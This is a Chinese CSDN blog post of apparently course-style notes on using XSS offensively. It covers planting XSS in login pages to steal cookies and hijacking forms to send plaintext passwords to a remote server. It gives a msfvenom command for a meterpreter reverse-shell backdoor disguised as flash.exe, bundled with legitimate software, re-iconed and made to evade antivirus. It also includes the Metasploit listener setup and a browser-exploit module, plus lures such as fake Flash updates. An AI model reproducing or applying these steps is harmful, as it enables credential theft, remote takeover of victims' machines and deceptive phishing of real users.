37、WEB攻防——通用漏洞&XSS跨站&权限维持&捆绑钓鱼&浏览器漏洞

最新推荐文章于 2024-05-21 18:30:36 发布
最新推荐文章于 2024-05-21 18:30:36 发布
阅读量689 收藏 10
点赞数 11
分类专栏: 小迪安全 文章标签: 前端 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/135873166
版权

文章目录


在这里插入图片描述
在这里插入图片描述

要想获取有效的cookie,需要:1、网站本身采用cookie进行验证;2、网站未做http-only等的防御手段。

XSS——后台植入Cookie&表单劫持(获取明文密码)

在这里插入图片描述

  1. 后台植入XSS获取Cookie,主要是在登录成功的文件中写入XSS代码,一旦有人登录成功访问登录成功的代码,就会触发XSS;
  2. 表单劫持,找到将用户名、密码提交给的特定文件,然后在文件中写入XSS,将明文用户名和密码发给远程服务器。
    在这里插入图片描述
  • 后端php代码中的echo都会输出到html页面;html页面中的js代码如<script>会被
    浏览器执行。
  • 表单劫持主要解决网站不使用cookie进行验证;获取明文密码。

XSS——Flash钓鱼配合MSF捆绑上线

条件:Beef上线受控后或直接钓鱼(受害这爱看sese)

  1. 生成后门,msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe > flash.exe
  2. 生成钓鱼网站,立即下载捆绑文件(正常软件+后门文件)
    在这里插入图片描述
    捆绑文件:
    一起压缩两个文件
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

这样就生成了一个捆绑文件。下一步使用资源修改器Restorator更改压缩文件的图标,使得其更加逼真。
在这里插入图片描述
为了更加隐蔽,还需要对后门文件进行免杀处理。

  1. MSF配置监听状态:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0 # 0.0.0.0代表本地任何网卡
set lport 6666
run # 监听
  1. 为什么点击该钓鱼网站:beef受控访问;某种爱好,提示flash版本低,需要安装新版flash。

XSS——浏览器网马配合MSF访问上线

条件:Beef上线受控后&直接钓鱼(浏览器存在0day),这种方式是直接攻击浏览器,生成带有网马的地址。用户一旦访问该网站,直接攻击浏览器,获取主机权限。

  1. 配置MSF生成URL(cve)
use exploit/windows/browser/ms14_064_old_code_execution
set allowpowershellpropmt true
set target 1
run
  1. 诱使受害者访问URL,思路:中了XSS之后,用beef直接跳转到网马网站

若漏洞是针对IE浏览器的,使用IE内核的其他浏览器也可能受该漏洞影响。注意漏洞的利用条件(系统版本、浏览器版本)

PT_silver
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
**XSS跨站脚本攻击详解** XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取Cookie、操纵页面内容,甚至进行更复杂的攻击。...
第28天:WEB漏洞-XSS跨站之WAF绕过及安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
XSS钓鱼攻击
WINDY_PACE的博客
05-13 1375
XSS 不与后台服务器产⽣数据交互,通过前端的dom节点形成的XSS漏洞,跟服务器⽆关。⼀...
Xss——Flash钓鱼
weixin_56291508的博客
04-22 673
Xss——Flash钓鱼
XSS另类攻击(二)表单劫持-获取账号信息
最新发布
05-21 830
XSS另类攻击(二)表单劫持-获取账号信息,XSS在线平台方式和自己实现方式,分析二者的优缺点。
网络攻防XSS Flash弹窗钓鱼
weixin_42282189的博客
11-15 2706
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
【每天学习一点新知识】XSS如何绕过HttpOnly获取Cookie以及XSS与CORS漏洞利用
RexHa的博客
10-27 5363
Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三种之一,并且HTTP头不超出(Accept,Accept-Language,Content-Language,Lat-Event-ID,Content-Type)这几种字段。(Cross-origin resource sharing),是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。
xss劫持 HTML 表单,XSS 之 form表单劫持(通用明文记录)
weixin_34217656的博客
07-02 1519
【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】很多时候大家可能某一时刻特别想知道管理员的密码,就算你拿下webshell了,数据库的密码也是加密的,解开会超级麻烦,那么你就需要试试xss这个插件了。【form表单劫持(通用明文记录)】个人觉得把这个XSS 放入jquery当后门用真心不错。。。就算管理员清除了网站木马后门,这个不一定能发现并清除。首先说一下对应名称...
WEB攻防-通用漏洞&XSS跨站-表单劫持&钓鱼捆绑
m0_65336233的博客
10-13 1139
WEB攻防-通用漏洞&XSS跨站-表单劫持&钓鱼捆绑
Web高级知识-跨域&XSS;&CSRF;解决方案
11-26
IP协议主要解决网络路由和寻址问题,TCP协议主要解决如何在IP层之上可靠的传递数据包,使在网络上的另一端收到发端发出的所有包,并且顺序与发出顺序一致。TCP有可靠,面向连接的特点。 ...也就是说,打开一个服务器上...
XSS & SQL注入
10-30
XSS(Cross-Site Scripting,跨站脚本)和 SQL 注入是两种常见的 Web 安全漏洞。下面将详细介绍 XSS 和 SQL 注入的概念、原理和应用。 什么是 XSSXSS,或者称为 CSS,代表着跨站脚本。基本上,XSS 意味着你可以...
web漏洞XSS_TEST漏洞实践练习代码
04-25
web漏洞XSS_TEST漏洞实践练习代码,下载解压后可直接使用。
【网络安全】XSS如何绕过HttpOnly获取Cookie以及XSS与CORS漏洞利用
A1_3_9_7的博客
12-28 1058
所谓简单请求,就是请求方式为GET,POST,HEAD这三种之一,并且HTTP头不超出(Accept,Accept-Language,Content-Language,Lat-Event-ID,Content-Type)这几种字段。(Cross-origin resource sharing),是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。其中,如果你等保模块学的好,还可以从事等保工程师。
XSS深入利用-权限维持
xiaoheizi的博客
06-29 298
在安全测试中能拿下数据库权限不代表就能拿下web权限,还有如果你留下的网站后门被杀死,就可以利用这些方法继续获取web权限表单劫持即可以解决cookie无效的情况,也可以解决获取到账号密码但是解密不成功的情况。利用:写入代码到登录成功文件,利用beef或xss平台实时监控Cookie等凭据实现。发现是login_check.php接收的,打开文件查看接收账号密码的参数。根据代码可以看到在管理员输入的账号密码被加密之前就被我们获取了。在我们的服务器上创建接收账号密码的代码文件并写入保存。
WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
siu~
09-10 546
1、XSS跨站-攻击利用-凭据盗取 2、XSS跨站-攻击利用-数据提交 3、XSS跨站-攻击利用-网络钓鱼 4、XSS跨站-攻击利用-溯源综合
Day54:WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
qq_61553520的博客
03-29 1399
小迪安全-Day54:WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
XSS漏洞个人总结
weixin_46739058的博客
04-26 2648
初级xss攻击思路,绕过
XSS跨站脚本攻击)原理详解(内含攻击实例)
qq_52642385的博客
07-05 6890
军锋真人cs野战123平台、xss平台(推荐自行搭建xss平台,不让别人白嫖咱自个的成果,蓝莲花战队的那个就挺好)、webshell箱子、postman、beef(kali上可能要自行下载,三行命令即可)、burpsuite、xsstrike【内含软件使用方法】原理:前端提交的一些参数转换为js代码,可以回显一些东西跨站:例如你将一段攻击代码通过留言存储到对方服务器上时,对方管理员在浏览时就可能会执行你所写的攻击语句。产生层面:前端函数类:一般应用js里面的一些输出类函数但是会受浏览器内核影响,一些浏览器
xss跨站脚本漏洞修复
08-31
XSS跨站脚本漏洞修复是保护网站免受潜在攻击的重要措施。下面是一些常见的修复方法: 1. 输入验证:对于用户输入的数据,进行严格的验证和过滤。使用白名单机制,只允许特定的字符和标签,过滤掉所有潜在的恶意脚本。 2. 输出编码:在将用户输入的数据输出到页面时,进行适当的编码操作,以防止浏览器将其解析为脚本代码。常用的编码方法包括HTML转义、URL编码等。 3. 设置HTTP头:使用安全的标头策略,如X-XSS-Protection、Content-Security-Policy等,以告诉浏览器如何处理潜在的XSS攻击。 4. Cookie安全措施:在设置Cookie时,使用HttpOnly属性,禁止通过脚本访问Cookie信息,从而减少XSS攻击的影响。 5. 安全沙箱:对于用户提供的富文本数据,使用合适的沙箱环境进行处理,限制其执行脚本的能力,确保不会造成恶意代码的注入。 6. 定期更新:保持软件和库的更新,及时修复已知的XSS漏洞。同时关注安全社区的最新消息,及时了解新的修复策略和最佳实践。 7. 高级防护措施:考虑使用Web应用防火墙(WAF)等高级安全工具来检测和阻止潜在的XSS攻击,提供额外的安全保护。 综上所述,修复XSS跨站脚本漏洞需要综合使用输入验证、输出编码、设置HTTP头、Cookie安全措施等多种方法,以加强网站的安全性。同时,定期更新软件和库,并采取高级防护措施有助于最大程度地降低XSS攻击风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值